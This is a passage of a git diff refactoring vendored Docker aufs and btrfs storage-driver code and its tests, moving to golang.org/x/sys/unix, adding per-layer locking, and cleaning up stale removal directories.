uidMaps, gidMaps []idtools.IDMap) (graphdriver.Driver, error) { - // Try to load the aufs kernel module if err := supportsAufs(); err != nil { + logger.Error(err) return nil, graphdriver.ErrNotSupported } - fsMagic, err := graphdriver.GetFSMagic(root) + // Perform feature detection on /var/lib/docker/aufs if it's an existing directory. + // This covers situations where /var/lib/docker/aufs is a mount, and on a different + // filesystem than /var/lib/docker. + // If the path does not exist, fall back to using /var/lib/docker for feature detection. + testdir := root + if _, err := os.Stat(testdir); os.IsNotExist(err) { + testdir = filepath.Dir(testdir) + } + + fsMagic, err := graphdriver.GetFSMagic(testdir) if err != nil { return nil, err } @@ -96,7 +111,7 @@ func Init(root string, options []string, uidMaps, gidMaps []idtools.IDMap) (grap switch fsMagic { case graphdriver.FsMagicAufs, graphdriver.FsMagicBtrfs, graphdriver.FsMagicEcryptfs: - logrus.Errorf("AUFS is not supported over %s", backingFs) + logger.Errorf("AUFS is not supported over %s", backingFs) return nil, graphdriver.ErrIncompatibleFS } @@ -112,33 +127,45 @@ func Init(root string, options []string, uidMaps, gidMaps []idtools.IDMap) (grap gidMaps: gidMaps, pathCache: make(map[string]string), ctr: graphdriver.NewRefCounter(graphdriver.NewFsChecker(graphdriver.FsMagicAufs)), + locker: locker.New(), } rootUID, rootGID, err := idtools.GetRootUIDGID(uidMaps, gidMaps) if err != nil { return nil, err } - // Create the root aufs driver dir and return - // if it already exists - // If not populate the dir structure - if err := idtools.MkdirAllAs(root, 0700, rootUID, rootGID); err != nil { - if os.IsExist(err) { - return a, nil - } - return nil, err - } - - if err := mountpk.MakePrivate(root); err != nil { + // Create the root aufs driver dir + if err := idtools.MkdirAllAndChown(root, 0700, idtools.IDPair{UID: rootUID, GID: rootGID}); err != nil { return nil, err } // Populate the dir structure for _, p := range paths { - if err := idtools.MkdirAllAs(path.Join(root, p), 0700, rootUID, rootGID); err != nil { + if err := idtools.MkdirAllAndChown(path.Join(root, p), 0700, idtools.IDPair{UID: rootUID, GID: rootGID}); err != nil { return nil, err } } + for _, path := range []string{"mnt", "diff"} { + p := filepath.Join(root, path) + entries, err := ioutil.ReadDir(p) + if err != nil { + logger.WithError(err).WithField("dir", p).Error("error reading dir entries") + continue + } + for _, entry := range entries { + if !entry.IsDir() { + continue + } + if strings.HasSuffix(entry.Name(), "-removing") { + logger.WithField("dir", entry.Name()).Debug("Cleaning up stale layer dir") + if err := system.EnsureRemoveAll(filepath.Join(p, entry.Name())); err != nil { + logger.WithField("dir", entry.Name()).WithError(err).Error("Error removing stale layer dir") + } + } + } + } + a.naiveDiff = graphdriver.NewNaiveDiffDriver(a, uidMaps, gidMaps) return a, nil } @@ -262,48 +289,17 @@ func (a *Driver) createDirsFor(id string) error { // The path of directories are /mnt/ // and /diff/ for _, p := range paths { - if err := idtools.MkdirAllAs(path.Join(a.rootPath(), p, id), 0755, rootUID, rootGID); err != nil { + if err := idtools.MkdirAllAndChown(path.Join(a.rootPath(), p, id), 0755, idtools.IDPair{UID: rootUID, GID: rootGID}); err != nil { return err } } return nil } -// Helper function to debug EBUSY errors on remove. -func debugEBusy(mountPath string) (out []string, err error) { - // lsof is not part of GNU coreutils. This is a best effort - // attempt to detect offending processes. - c := exec.Command("lsof") - - r, err := c.StdoutPipe() - if err != nil { - return nil, fmt.Errorf("Assigning pipes failed with %v", err) - } - - if err := c.Start(); err != nil { - return nil, fmt.Errorf("Starting %s failed with %v", c.Path, err) - } - - defer func() { - waiterr := c.Wait() - if waiterr != nil && err == nil { - err = fmt.Errorf("Waiting for %s failed with %v", c.Path, waiterr) - } - }() - - sc := bufio.NewScanner(r) - for sc.Scan() { - entry := sc.Text() - if strings.Contains(entry, mountPath) { - out = append(out, entry, "\n") - } - } - - return out, nil -} - // Remove will unmount and remove the given id. func (a *Driver) Remove(id string) error { + a.locker.Lock(id) + defer a.locker.Unlock(id) a.pathCacheLock.Lock() mountpoint, exists := a.pathCache[id] a.pathCacheLock.Unlock() @@ -311,61 +307,55 @@ func (a *Driver) Remove(id string) error { mountpoint = a.getMountpoint(id) } + logger := logger.WithField("layer", id) + var retries int for { mounted, err := a.mounted(mountpoint) if err != nil { + if os.IsNotExist(err) { + break + } return err } if !mounted { break } - if err := a.unmount(mountpoint); err != nil { - if err != syscall.EBUSY { - return fmt.Errorf("aufs: unmount error: %s: %v", mountpoint, err) - } - if retries >= 5 { - out, debugErr := debugEBusy(mountpoint) - if debugErr == nil { - logrus.Warnf("debugEBusy returned %v", out) - } - return fmt.Errorf("aufs: unmount error after retries: %s: %v", mountpoint, err) - } - // If unmount returns EBUSY, it could be a transient error. Sleep and retry. - retries++ - logrus.Warnf("unmount failed due to EBUSY: retry count: %d", retries) - time.Sleep(100 * time.Millisecond) - continue + err = a.unmount(mountpoint) + if err == nil { + break } - break - } - // Atomically remove each directory in turn by first moving it out of the - // way (so that docker doesn't find it anymore) before doing removal of - // the whole tree. - tmpMntPath := path.Join(a.mntPath(), fmt.Sprintf("%s-removing", id)) - if err := os.Rename(mountpoint, tmpMntPath); err != nil && !os.IsNotExist(err) { - if err == syscall.EBUSY { - logrus.Warn("os.Rename err due to EBUSY") - out, debugErr := debugEBusy(mountpoint) - if debugErr == nil { - logrus.Warnf("debugEBusy returned %v", out) - } + if err != unix.EBUSY { + return errors.Wrapf(err, "aufs: unmount error: %s", mountpoint) } - return err - } - defer os.RemoveAll(tmpMntPath) - - tmpDiffpath := path.Join(a.diffPath(), fmt.Sprintf("%s-removing", id)) - if err := os.Rename(a.getDiffPath(id), tmpDiffpath); err != nil && !os.IsNotExist(err) { - return err + if retries >= 5 { + return errors.Wrapf(err, "aufs: unmount error after retries: %s", mountpoint) + } + // If unmount returns EBUSY, it could be a transient error. Sleep and retry. + retries++ + logger.Warnf("unmount failed due to EBUSY: retry count: %d", retries) + time.Sleep(100 * time.Millisecond) } - defer os.RemoveAll(tmpDiffpath) // Remove the layers file for the id if err := os.Remove(path.Join(a.rootPath(), "layers", id)); err != nil && !os.IsNotExist(err) { - return err + return errors.Wrapf(err, "error removing layers dir for %s", id) + } + + if err := atomicRemove(a.getDiffPath(id)); err != nil { + return errors.Wrapf(err, "could not remove diff path for id %s", id) + } + + // Atomically remove each directory in turn by first moving it out of the + // way (so that docker doesn't find it anymore) before doing removal of + // the whole tree. + if err := atomicRemove(mountpoint); err != nil { + if errors.Cause(err) == unix.EBUSY { + logger.WithField("dir", mountpoint).WithError(err).Warn("error performing atomic remove due to EBUSY") + } + return errors.Wrapf(err, "could not remove mountpoint for id %s", id) } a.pathCacheLock.Lock() @@ -374,12 +364,32 @@ func (a *Driver) Remove(id string) error { return nil } +func atomicRemove(source string) error { + target := source + "-removing" + + err := os.Rename(source, target) + switch { + case err == nil, os.IsNotExist(err): + case os.IsExist(err): + // Got error saying the target dir already exists, maybe the source doesn't exist due to a previous (failed) remove + if _, e := os.Stat(source); !os.IsNotExist(e) { + return errors.Wrapf(err, "target rename dir '%s' exists but should not, this needs to be manually cleaned up") + } + default: + return errors.Wrapf(err, "error preparing atomic delete") + } + + return system.EnsureRemoveAll(target) +} + // Get returns the rootfs path for the id. // This will mount the dir at its given path -func (a *Driver) Get(id, mountLabel string) (string, error) { +func (a *Driver) Get(id, mountLabel string) (containerfs.ContainerFS, error) { + a.locker.Lock(id) + defer a.locker.Unlock(id) parents, err := a.getParentLayerPaths(id) if err != nil && !os.IsNotExist(err) { - return "", err + return nil, err } a.pathCacheLock.Lock() @@ -393,25 +403,27 @@ func (a *Driver) Get(id, mountLabel string) (string, error) { } } if count := a.ctr.Increment(m); count > 1 { - return m, nil + return containerfs.NewLocalContainerFS(m), nil } // If a dir does not have a parent ( no layers )do not try to mount // just return the diff path to the data if len(parents) > 0 { if err := a.mount(id, m, mountLabel, parents); err != nil { - return "", err + return nil, err } } a.pathCacheLock.Lock() a.pathCache[id] = m a.pathCacheLock.Unlock() - return m, nil + return containerfs.NewLocalContainerFS(m), nil } // Put unmounts and updates list of active mounts. func (a *Driver) Put(id string) error { + a.locker.Lock(id) + defer a.locker.Unlock(id) a.pathCacheLock.Lock() m, exists := a.pathCache[id] if !exists { @@ -425,7 +437,7 @@ func (a *Driver) Put(id string) error { err := a.unmount(m) if err != nil { - logrus.Debugf("Failed to unmount %s aufs: %v", id, err) + logger.Debugf("Failed to unmount %s aufs: %v", id, err) } return err } @@ -485,7 +497,7 @@ func (a *Driver) DiffSize(id, parent string) (size int64, err error) { return a.naiveDiff.DiffSize(id, parent) } // AUFS doesn't need the parent layer to calculate the diff size. - return directory.Size(path.Join(a.rootPath(), "diff", id)) + return directory.Size(context.TODO(), path.Join(a.rootPath(), "diff", id)) } // ApplyDiff extracts the changeset from the given diff into the @@ -558,10 +570,7 @@ func (a *Driver) unmount(mountPath string) error { if mounted, err := a.mounted(mountPath); err != nil || !mounted { return err } - if err := Unmount(mountPath); err != nil { - return err - } - return nil + return Unmount(mountPath) } func (a *Driver) mounted(mountpoint string) (bool, error) { @@ -586,10 +595,10 @@ func (a *Driver) Cleanup() error { for _, m := range dirs { if err := a.unmount(m); err != nil { - logrus.Debugf("aufs error unmounting %s: %s", m, err) + logger.Debugf("error unmounting %s: %s", m, err) } } - return mountpk.Unmount(a.root) + return mountpk.RecursiveUnmount(a.root) } func (a *Driver) aufsMount(ro []string, rw, target, mountLabel string) (err error) { @@ -604,9 +613,9 @@ func (a *Driver) aufsMount(ro []string, rw, target, mountLabel string) (err erro offset := 54 if useDirperm() { - offset += len("dirperm1") + offset += len(",dirperm1") } - b := make([]byte, syscall.Getpagesize()-len(mountLabel)-offset) // room for xino & mountLabel + b := make([]byte, unix.Getpagesize()-len(mountLabel)-offset) // room for xino & mountLabel bp := copy(b, fmt.Sprintf("br:%s=rw", rw)) index := 0 @@ -630,7 +639,7 @@ func (a *Driver) aufsMount(ro []string, rw, target, mountLabel string) (err erro for ; index < len(ro); index++ { layer := fmt.Sprintf(":%s=ro+wh", ro[index]) data := label.FormatMountLabel(fmt.Sprintf("append%s", layer), mountLabel) - if err = mount("none", target, "aufs", syscall.MS_REMOUNT, data); err != nil { + if err = mount("none", target, "aufs", unix.MS_REMOUNT, data); err != nil { return } } @@ -644,14 +653,14 @@ func useDirperm() bool { enableDirpermLock.Do(func() { base, err := ioutil.TempDir("", "docker-aufs-base") if err != nil { - logrus.Errorf("error checking dirperm1: %v", err) + logger.Errorf("error checking dirperm1: %v", err) return } defer os.RemoveAll(base) union, err := ioutil.TempDir("", "docker-aufs-union") if err != nil { - logrus.Errorf("error checking dirperm1: %v", err) + logger.Errorf("error checking dirperm1: %v", err) return } defer os.RemoveAll(union) @@ -662,7 +671,7 @@ func useDirperm() bool { } enableDirperm = true if err := Unmount(union); err != nil { - logrus.Errorf("error checking dirperm1: failed to unmount %v", err) + logger.Errorf("error checking dirperm1: failed to unmount %v", err) } }) return enableDirperm diff --git a/vendor/github.com/docker/docker/daemon/graphdriver/aufs/aufs_test.go b/vendor/github.com/docker/docker/daemon/graphdriver/aufs/aufs_test.go index dc3c6a392b..fdc502ba65 100644 --- a/vendor/github.com/docker/docker/daemon/graphdriver/aufs/aufs_test.go +++ b/vendor/github.com/docker/docker/daemon/graphdriver/aufs/aufs_test.go @@ -1,6 +1,6 @@ // +build linux -package aufs +package aufs // import "github.com/docker/docker/daemon/graphdriver/aufs" import ( "crypto/sha256" @@ -9,6 +9,7 @@ import ( "io/ioutil" "os" "path" + "path/filepath" "sync" "testing" @@ -16,6 +17,8 @@ import ( "github.com/docker/docker/pkg/archive" "github.com/docker/docker/pkg/reexec" "github.com/docker/docker/pkg/stringid" + "gotest.tools/assert" + is "gotest.tools/assert/cmp" ) var ( @@ -39,6 +42,14 @@ func testInit(dir string, t testing.TB) graphdriver.Driver { return d } +func driverGet(d *Driver, id string, mntLabel string) (string, error) { + mnt, err := d.Get(id, mntLabel) + if err != nil { + return "", err + } + return mnt.Path(), nil +} + func newDriver(t testing.TB) *Driver { if err := os.MkdirAll(tmp, 0755); err != nil { t.Fatal(err) @@ -56,7 +67,7 @@ func TestNewDriver(t *testing.T) { d := testInit(tmp, t) defer os.RemoveAll(tmp) if d == nil { - t.Fatalf("Driver should not be nil") + t.Fatal("Driver should not be nil") } } @@ -147,7 +158,10 @@ func TestRemoveImage(t *testing.T) { for _, p := range paths { if _, err := os.Stat(path.Join(tmp, p, "1")); err == nil { - t.Fatalf("Error should not be nil because dirs with id 1 should be delted: %s", p) + t.Fatalf("Error should not be nil because dirs with id 1 should be deleted: %s", p) + } + if _, err := os.Stat(path.Join(tmp, p, "1-removing")); err == nil { + t.Fatalf("Error should not be nil because dirs with id 1-removing should be deleted: %s", p) } } } @@ -165,7 +179,7 @@ func TestGetWithoutParent(t *testing.T) { t.Fatal(err) } expected := path.Join(tmp, "diff", "1") - if diffPath != expected { + if diffPath.Path() != expected { t.Fatalf("Expected path %s got %s", expected, diffPath) } } @@ -174,9 +188,8 @@ func TestCleanupWithNoDirs(t *testing.T) { d := newDriver(t) defer os.RemoveAll(tmp) - if err := d.Cleanup(); err != nil { - t.Fatal(err) - } + err := d.Cleanup() + assert.Check(t, err) } func TestCleanupWithDir(t *testing.T) { @@ -196,45 +209,30 @@ func TestMountedFalseResponse(t *testing.T) { d := newDriver(t) defer os.RemoveAll(tmp) - if err := d.Create("1", "", nil); err != nil { - t.Fatal(err) - } + err := d.Create("1", "", nil) + assert.NilError(t, err) response, err := d.mounted(d.getDiffPath("1")) - if err != nil { - t.Fatal(err) - } - - if response != false { - t.Fatalf("Response if dir id 1 is mounted should be false") - } + assert.NilError(t, err) + assert.Check(t, !response) } -func TestMountedTrueReponse(t *testing.T) { +func TestMountedTrueResponse(t *testing.T) { d := newDriver(t) defer os.RemoveAll(tmp) defer d.Cleanup() - if err := d.Create("1", "", nil); err != nil { - t.Fatal(err) - } - if err := d.Create("2", "1", nil); err != nil { - t.Fatal(err) - } + err := d.Create("1", "", nil) + assert.NilError(t, err) + err = d.Create("2", "1", nil) + assert.NilError(t, err) - _, err := d.Get("2", "") - if err != nil { - t.Fatal(err) - } + _, err = d.Get("2", "") + assert.NilError(t, err) response, err := d.mounted(d.pathCache["2"]) - if err != nil { - t.Fatal(err) - } - - if response != true { - t.Fatalf("Response if dir id 2 is mounted should be true") - } + assert.NilError(t, err) + assert.Check(t, response) } func TestMountWithParent(t *testing.T) { @@ -258,13 +256,13 @@ func TestMountWithParent(t *testing.T) { if err != nil { t.Fatal(err) } - if mntPath == "" { - t.Fatal("mntPath should not be empty string") + if mntPath == nil { + t.Fatal("mntPath should not be nil") } expected := path.Join(tmp, "mnt", "2") - if mntPath != expected { - t.Fatalf("Expected %s got %s", expected, mntPath) + if mntPath.Path() != expected { + t.Fatalf("Expected %s got %s", expected, mntPath.Path()) } } @@ -289,8 +287,8 @@ func TestRemoveMountedDir(t *testing.T) { if err != nil { t.Fatal(err) } - if mntPath == "" { - t.Fatal("mntPath should not be empty string") + if mntPath == nil { + t.Fatal("mntPath should not be nil") } mounted, err := d.mounted(d.pathCache["2"]) @@ -299,7 +297,7 @@ func TestRemoveMountedDir(t *testing.T) { } if !mounted { - t.Fatalf("Dir id 2 should be mounted") + t.Fatal("Dir id 2 should be mounted") } if err := d.Remove("2"); err != nil { @@ -312,7 +310,7 @@ func TestCreateWithInvalidParent(t *testing.T) { defer os.RemoveAll(tmp) if err := d.Create("1", "docker", nil); err == nil { - t.Fatalf("Error should not be nil with parent does not exist") + t.Fatal("Error should not be nil with parent does not exist") } } @@ -324,7 +322,7 @@ func TestGetDiff(t *testing.T) { t.Fatal(err) } - diffPath, err := d.Get("1", "") + diffPath, err := driverGet(d, "1", "") if err != nil { t.Fatal(err) } @@ -346,7 +344,7 @@ func TestGetDiff(t *testing.T) { t.Fatal(err) } if a == nil { - t.Fatalf("Archive should not be nil") + t.Fatal("Archive should not be nil") } } @@ -368,7 +366,7 @@ func TestChanges(t *testing.T) { } }() - mntPoint, err := d.Get("2", "") + mntPoint, err := driverGet(d, "2", "") if err != nil { t.Fatal(err) } @@ -407,7 +405,7 @@ func TestChanges(t *testing.T) { if err := d.CreateReadWrite("3", "2", nil); err != nil { t.Fatal(err) } - mntPoint, err = d.Get("3", "") + mntPoint, err = driverGet(d, "3", "") if err != nil { t.Fatal(err) } @@ -453,7 +451,7 @@ func TestDiffSize(t *testing.T) { t.Fatal(err) } - diffPath, err := d.Get("1", "") + diffPath, err := driverGet(d, "1", "") if err != nil { t.Fatal(err) } @@ -495,7 +493,7 @@ func TestChildDiffSize(t *testing.T) { t.Fatal(err) } - diffPath, err := d.Get("1", "") + diffPath, err := driverGet(d, "1", "") if err != nil { t.Fatal(err) } @@ -569,9 +567,8 @@ func TestStatus(t *testing.T) { } status := d.Status() - if status == nil || len(status) == 0 { - t.Fatal("Status should not be nil or empty") - } + assert.Check(t, is.Len(status, 4)) + rootDir := status[0] dirs := status[2] if rootDir[0] != "Root Dir" { @@ -597,7 +594,7 @@ func TestApplyDiff(t *testing.T) { t.Fatal(err) } - diffPath, err := d.Get("1", "") + diffPath, err := driverGet(d, "1", "") if err != nil { t.Fatal(err) } @@ -632,7 +629,7 @@ func TestApplyDiff(t *testing.T) { // Ensure that the file is in the mount point for id 3 - mountPoint, err := d.Get("3", "") + mountPoint, err := driverGet(d, "3", "") if err != nil { t.Fatal(err) } @@ -672,48 +669,34 @@ func testMountMoreThan42Layers(t *testing.T, mountPath string) { } current = hash(current) - if err := d.CreateReadWrite(current, parent, nil); err != nil { - t.Logf("Current layer %d", i) - t.Error(err) - } - point, err := d.Get(current, "") - if err != nil { - t.Logf("Current layer %d", i) - t.Error(err) - } + err := d.CreateReadWrite(current, parent, nil) + assert.NilError(t, err, "current layer %d", i) + + point, err := driverGet(d, current, "") + assert.NilError(t, err, "current layer %d", i) + f, err := os.Create(path.Join(point, current)) - if err != nil { - t.Logf("Current layer %d", i) - t.Error(err) - } + assert.NilError(t, err, "current layer %d", i) f.Close() if i%10 == 0 { - if err := os.Remove(path.Join(point, parent)); err != nil { - t.Logf("Current layer %d", i) - t.Error(err) - } + err := os.Remove(path.Join(point, parent)) + assert.NilError(t, err, "current layer %d", i) expected-- } last = current } // Perform the actual mount for the top most image - point, err := d.Get(last, "") - if err != nil { - t.Error(err) - } + point, err := driverGet(d, last, "") + assert.NilError(t, err) files, err := ioutil.ReadDir(point) - if err != nil { - t.Error(err) - } - if len(files) != expected { - t.Errorf("Expected %d got %d", expected, len(files)) - } + assert.NilError(t, err) + assert.Check(t, is.Len(files, expected)) } func TestMountMoreThan42Layers(t *testing.T) { - os.RemoveAll(tmpOuter) + defer os.RemoveAll(tmpOuter) testMountMoreThan42Layers(t, tmp) } @@ -744,10 +727,10 @@ func BenchmarkConcurrentAccess(b *testing.B) { defer os.RemoveAll(tmp) defer d.Cleanup() - numConcurent := 256 + numConcurrent := 256 // create a bunch of ids var ids []string - for i := 0; i < numConcurent; i++ { + for i := 0; i < numConcurrent; i++ { ids = append(ids, stringid.GenerateNonCryptoID()) } @@ -762,7 +745,7 @@ func BenchmarkConcurrentAccess(b *testing.B) { parent := ids[1] ids = append(ids[2:]) - chErr := make(chan error, numConcurent) + chErr := make(chan error, numConcurrent) var outerGroup sync.WaitGroup outerGroup.Add(len(ids)) b.StartTimer() @@ -800,3 +783,23 @@ func BenchmarkConcurrentAccess(b *testing.B) { } } } + +func TestInitStaleCleanup(t *testing.T) { + if err := os.MkdirAll(tmp, 0755); err != nil { + t.Fatal(err) + } + defer os.RemoveAll(tmp) + + for _, d := range []string{"diff", "mnt"} { + if err := os.MkdirAll(filepath.Join(tmp, d, "123-removing"), 0755); err != nil { + t.Fatal(err) + } + } + + testInit(tmp, t) + for _, d := range []string{"diff", "mnt"} { + if _, err := os.Stat(filepath.Join(tmp, d, "123-removing")); err == nil { + t.Fatal("cleanup failed") + } + } +} diff --git a/vendor/github.com/docker/docker/daemon/graphdriver/aufs/dirs.go b/vendor/github.com/docker/docker/daemon/graphdriver/aufs/dirs.go index d2325fc46c..e60be5e3c9 100644 --- a/vendor/github.com/docker/docker/daemon/graphdriver/aufs/dirs.go +++ b/vendor/github.com/docker/docker/daemon/graphdriver/aufs/dirs.go @@ -1,6 +1,6 @@ // +build linux -package aufs +package aufs // import "github.com/docker/docker/daemon/graphdriver/aufs" import ( "bufio" @@ -15,7 +15,7 @@ func loadIds(root string) ([]string, error) { if err != nil { return nil, err } - out := []string{} + var out []string for _, d := range dirs { if !d.IsDir() { out = append(out, d.Name()) @@ -36,7 +36,7 @@ func getParentIDs(root, id string) ([]string, error) { } defer f.Close() - out := []string{} + var out []string s := bufio.NewScanner(f) for s.Scan() { diff --git a/vendor/github.com/docker/docker/daemon/graphdriver/aufs/mount.go b/vendor/github.com/docker/docker/daemon/graphdriver/aufs/mount.go index da1e892f44..9f5510380c 100644 --- a/vendor/github.com/docker/docker/daemon/graphdriver/aufs/mount.go +++ b/vendor/github.com/docker/docker/daemon/graphdriver/aufs/mount.go @@ -1,21 +1,17 @@ // +build linux -package aufs +package aufs // import "github.com/docker/docker/daemon/graphdriver/aufs" import ( "os/exec" - "syscall" - "github.com/Sirupsen/logrus" + "golang.org/x/sys/unix" ) // Unmount the target specified. func Unmount(target string) error { if err := exec.Command("auplink", target, "flush").Run(); err != nil { - logrus.Warnf("Couldn't run auplink before unmount %s: %s", target, err) + logger.WithError(err).Warnf("Couldn't run auplink before unmount %s", target) } - if err := syscall.Unmount(target, 0); err != nil { - return err - } - return nil + return unix.Unmount(target, 0) } diff --git a/vendor/github.com/docker/docker/daemon/graphdriver/aufs/mount_linux.go b/vendor/github.com/docker/docker/daemon/graphdriver/aufs/mount_linux.go index 8062bae420..8d5ad8f32d 100644 --- a/vendor/github.com/docker/docker/daemon/graphdriver/aufs/mount_linux.go +++ b/vendor/github.com/docker/docker/daemon/graphdriver/aufs/mount_linux.go @@ -1,7 +1,7 @@ -package aufs +package aufs // import "github.com/docker/docker/daemon/graphdriver/aufs" -import "syscall" +import "golang.org/x/sys/unix" func mount(source string, target string, fstype string, flags uintptr, data string) error { - return syscall.Mount(source, target, fstype, flags, data) + return unix.Mount(source, target, fstype, flags, data) } diff --git a/vendor/github.com/docker/docker/daemon/graphdriver/aufs/mount_unsupported.go b/vendor/github.com/docker/docker/daemon/graphdriver/aufs/mount_unsupported.go index d030b06637..cf7f58c29e 100644 --- a/vendor/github.com/docker/docker/daemon/graphdriver/aufs/mount_unsupported.go +++ b/vendor/github.com/docker/docker/daemon/graphdriver/aufs/mount_unsupported.go @@ -1,6 +1,6 @@ // +build !linux -package aufs +package aufs // import "github.com/docker/docker/daemon/graphdriver/aufs" import "errors" diff --git a/vendor/github.com/docker/docker/daemon/graphdriver/btrfs/btrfs.go b/vendor/github.com/docker/docker/daemon/graphdriver/btrfs/btrfs.go index 44420f11a7..cac6240303 100644 --- a/vendor/github.com/docker/docker/daemon/graphdriver/btrfs/btrfs.go +++ b/vendor/github.com/docker/docker/daemon/graphdriver/btrfs/btrfs.go @@ -1,6 +1,6 @@ // +build linux -package btrfs +package btrfs // import "github.com/docker/docker/daemon/graphdriver/btrfs" /* #include @@ -16,30 +16,31 @@ import "C" import ( "fmt" + "io/ioutil" + "math" "os" "path" "path/filepath" + "strconv" "strings" - "syscall" + "sync" "unsafe" "github.com/docker/docker/daemon/graphdriver" + "github.com/docker/docker/pkg/containerfs" "github.com/docker/docker/pkg/idtools" - "github.com/docker/docker/pkg/mount" "github.com/docker/docker/pkg/parsers" + "github.com/docker/docker/pkg/system" "github.com/docker/go-units" - "github.com/opencontainers/runc/libcontainer/label" + "github.com/opencontainers/selinux/go-selinux/label" + "github.com/sirupsen/logrus" + "golang.org/x/sys/unix" ) func init() { graphdriver.Register("btrfs", Init) } -var ( - quotaEnabled = false - userDiskQuota = false -) - type btrfsOptions struct { minSpace uint64 size uint64 @@ -49,7 +50,16 @@ type btrfsOptions struct { // An error is returned if BTRFS is not supported. func Init(home string, options []string, uidMaps, gidMaps []idtools.IDMap) (graphdriver.Driver, error) { - fsMagic, err := graphdriver.GetFSMagic(home) + // Perform feature detection on /var/lib/docker/btrfs if it's an existing directory. + // This covers situations where /var/lib/docker/btrfs is a mount, and on a different + // filesystem than /var/lib/docker. + // If the path does not exist, fall back to using /var/lib/docker for feature detection. + testdir := home + if _, err := os.Stat(testdir); os.IsNotExist(err) { + testdir = filepath.Dir(testdir) + } + + fsMagic, err := graphdriver.GetFSMagic(testdir) if err != nil { return nil, err } @@ -62,26 +72,15 @@ func Init(home string, options []string, uidMaps, gidMaps []idtools.IDMap) (grap if err != nil { return nil, err } - if err := idtools.MkdirAllAs(home, 0700, rootUID, rootGID); err != nil { - return nil, err - } - - if err := mount.MakePrivate(home); err != nil { + if err := idtools.MkdirAllAndChown(home, 0700, idtools.IDPair{UID: rootUID, GID: rootGID}); err != nil { return nil, err } - opt, err := parseOptions(options) + opt, userDiskQuota, err := parseOptions(options) if err != nil { return nil, err } - if userDiskQuota { - if err := subvolEnableQuota(home); err != nil { - return nil, err - } - quotaEnabled = true - } - driver := &Driver{ home: home, uidMaps: uidMaps, @@ -89,39 +88,48 @@ func Init(home string, options []string, uidMaps, gidMaps []idtools.IDMap) (grap options: opt, } + if userDiskQuota { + if err := driver.subvolEnableQuota(); err != nil { + return nil, err + } + } + return graphdriver.NewNaiveDiffDriver(driver, uidMaps, gidMaps), nil } -func parseOptions(opt []string) (btrfsOptions, error) { +func parseOptions(opt []string) (btrfsOptions, bool, error) { var options btrfsOptions + userDiskQuota := false for _, option := range opt { key, val, err := parsers.ParseKeyValueOpt(option) if err != nil { - return options, err + return options, userDiskQuota, err } key = strings.ToLower(key) switch key { case "btrfs.min_space": minSpace, err := units.RAMInBytes(val) if err != nil { - return options, err + return options, userDiskQuota, err } userDiskQuota = true options.minSpace = uint64(minSpace) default: - return options, fmt.Errorf("Unknown option %s", key) + return options, userDiskQuota, fmt.Errorf("Unknown option %s", key) } } - return options, nil + return options, userDiskQuota, nil } // Driver contains information about the filesystem mounted. type Driver struct { //root of the file system - home string - uidMaps []idtools.IDMap - gidMaps []idtools.IDMap - options btrfsOptions + home string + uidMaps []idtools.IDMap + gidMaps []idtools.IDMap + options btrfsOptions + quotaEnabled bool + once sync.Once } // String prints the name of the driver (btrfs). @@ -150,13 +158,7 @@ func (d *Driver) GetMetadata(id string) (map[string]string, error) { // Cleanup unmounts the home directory. func (d *Driver) Cleanup() error { - if quotaEnabled { - if err := subvolDisableQuota(d.home); err != nil { - return err - } - } - - return mount.Unmount(d.home) + return d.subvolDisableQuota() } func free(p *C.char) { @@ -196,7 +198,7 @@ func subvolCreate(path, name string) error { args.name[i] = C.char(c) } - _, _, errno := syscall.Syscall(syscall.SYS_IOCTL, getDirFd(dir), C.BTRFS_IOC_SUBVOL_CREATE, + _, _, errno := unix.Syscall(unix.SYS_IOCTL, getDirFd(dir), C.BTRFS_IOC_SUBVOL_CREATE, uintptr(unsafe.Pointer(&args))) if errno != 0 { return fmt.Errorf("Failed to create btrfs subvolume: %v", errno.Error()) @@ -224,7 +226,7 @@ func subvolSnapshot(src, dest, name string) error { C.set_name_btrfs_ioctl_vol_args_v2(&args, cs) C.free(unsafe.Pointer(cs)) - _, _, errno := syscall.Syscall(syscall.SYS_IOCTL, getDirFd(destDir), C.BTRFS_IOC_SNAP_CREATE_V2, + _, _, errno := unix.Syscall(unix.SYS_IOCTL, getDirFd(destDir), C.BTRFS_IOC_SNAP_CREATE_V2, uintptr(unsafe.Pointer(&args))) if errno != 0 { return fmt.Errorf("Failed to create btrfs snapshot: %v", errno.Error()) @@ -233,8 +235,8 @@ func subvolSnapshot(src, dest, name string) error { } func isSubvolume(p string) (bool, error) { - var bufStat syscall.Stat_t - if err := syscall.Lstat(p, &bufStat); err != nil { + var bufStat unix.Stat_t + if err := unix.Lstat(p, &bufStat); err != nil { return false, err } @@ -242,7 +244,7 @@ func isSubvolume(p string) (bool, error) { return bufStat.Ino == C.BTRFS_FIRST_FREE_OBJECTID, nil } -func subvolDelete(dirpath, name string) error { +func subvolDelete(dirpath, name string, quotaEnabled bool) error { dir, err := openDir(dirpath) if err != nil { return err @@ -270,7 +272,7 @@ func subvolDelete(dirpath, name string) error { return fmt.Errorf("Failed to test if %s is a btrfs subvolume: %v", p, err) } if sv { - if err := subvolDelete(path.Dir(p), f.Name()); err != nil { + if err := subvolDelete(path.Dir(p), f.Name(), quotaEnabled); err != nil { return fmt.Errorf("Failed to destroy btrfs child subvolume (%s) of parent (%s): %v", p, dirpath, err) } } @@ -281,12 +283,27 @@ func subvolDelete(dirpath, name string) error { return fmt.Errorf("Recursively walking subvolumes for %s failed: %v", dirpath, err) } + if quotaEnabled { + if qgroupid, err := subvolLookupQgroup(fullPath); err == nil { + var args C.struct_btrfs_ioctl_qgroup_create_args + args.qgroupid = C.__u64(qgroupid) + + _, _, errno := unix.Syscall(unix.SYS_IOCTL, getDirFd(dir), C.BTRFS_IOC_QGROUP_CREATE, + uintptr(unsafe.Pointer(&args))) + if errno != 0 { + logrus.WithField("storage-driver", "btrfs").Errorf("Failed to delete btrfs qgroup %v for %s: %v", qgroupid, fullPath, errno.Error()) + } + } else { + logrus.WithField("storage-driver", "btrfs").Errorf("Failed to lookup btrfs qgroup for %s: %v", fullPath, err.Error()) + } + } + // all subvolumes have been removed // now remove the one originally passed in for i, c := range []byte(name) { args.name[i] = C.char(c) } - _, _, errno := syscall.Syscall(syscall.SYS_IOCTL, getDirFd(dir), C.BTRFS_IOC_SNAP_DESTROY, + _, _, errno := unix.Syscall(unix.SYS_IOCTL, getDirFd(dir), C.BTRFS_IOC_SNAP_DESTROY, uintptr(unsafe.Pointer(&args))) if errno != 0 { return fmt.Errorf("Failed to destroy btrfs snapshot %s for %s: %v", dirpath, name, errno.Error()) 